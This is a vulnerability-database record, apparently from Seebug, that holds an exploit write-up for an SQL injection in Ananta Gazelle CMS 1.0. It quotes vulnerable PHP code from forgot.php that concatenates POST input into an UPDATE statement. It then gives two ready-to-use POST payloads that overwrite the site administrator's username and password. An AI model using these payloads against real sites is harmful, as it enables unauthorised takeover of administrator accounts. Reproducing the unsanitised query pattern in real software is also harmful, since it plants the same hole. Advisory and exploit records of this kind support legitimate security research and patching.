{"lastseen": "2017-11-19T15:22:37", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "href": "https://www.seebug.org/vuldb/ssvid-72571", "references": [], "enchantments_done": [], "id": "SSV:72571", "title": "Ananta Gazelle CMS - Update Statement SQL Injection", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n # Exploit Title: Ananta Gazelle CMS - Update Statement SQL Injection\r\n# Google Dork: -\r\n# Date: 07-02-2012\r\n# Author: hackme\r\n# Software Link: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/\r\n# Version: 1.0 stable\r\n# Tested on: backbox 2.1\r\n# CVE : -\r\n\r\n[SORRY FOR MY BAD ENGLISH]\r\n\r\n[+] This SQL injection does not let us read the contents of the tables, but it does let us alter the UPDATE statement to change the admin's username and password.\r\nBecause special characters such as the single quote cannot be entered, we cannot set the username and password to values of our choice; instead we copy the value of a column that has a default value into the username and password columns.\r\nAs a result we have:\r\n\t\r\n\tadmin - username = 1\r\n - password = 1\r\n\r\n[+] Vulnerable Code (forgot.php): \r\n[CODE]\r\nif (!empty($_POST) && !isset($_POST["loginform"])) {\r\n\t// form submitted, set a new activation key for this user (however don't set the user to inactive, so no-one can block someone else's account\r\n\t$sql = "UPDATE ".$tableprefix.$_POST["table"]." SET ";\r\n\t\r\n\tif ($_POST["activate"] <> "") {\r\n\t\t$sql = $sql."activate='".$_POST["activate"]."'";\r\n\t}\r\n\t\r\n\t$sql = $sql." WHERE email"."='".$_POST["email"]."'";\r\n\t// no validation of the input before the query runs\r\n\tif (mysql_query($sql)) {\r\n[/code]\r\n[+] Default columns of the users table: number,name,pass,email,activate,active,admin,joindate,showemail\r\n[+] Risk: High\r\n[+] Vuln Page: www.site.it/ananta/forgot.php\r\n\r\n[+] Change admin username to "1" [POST-DATA]\r\nemail=&save=Save&table=users SET name=active where number=1--&activate=lol&location=/ananta/forgot.php\r\n\r\n[+] Change admin password to "1" [POST-DATA]\r\nemail=v&save=Save&table=users SET pass=md5(active) where number=1--&activate=lol&location=/ananta/forgot.php\r\n\r\n[+]...If You Really Want Something, You Can Have It...\r\n\r\n[+] Greetz To: MZ\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72571", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645419742}}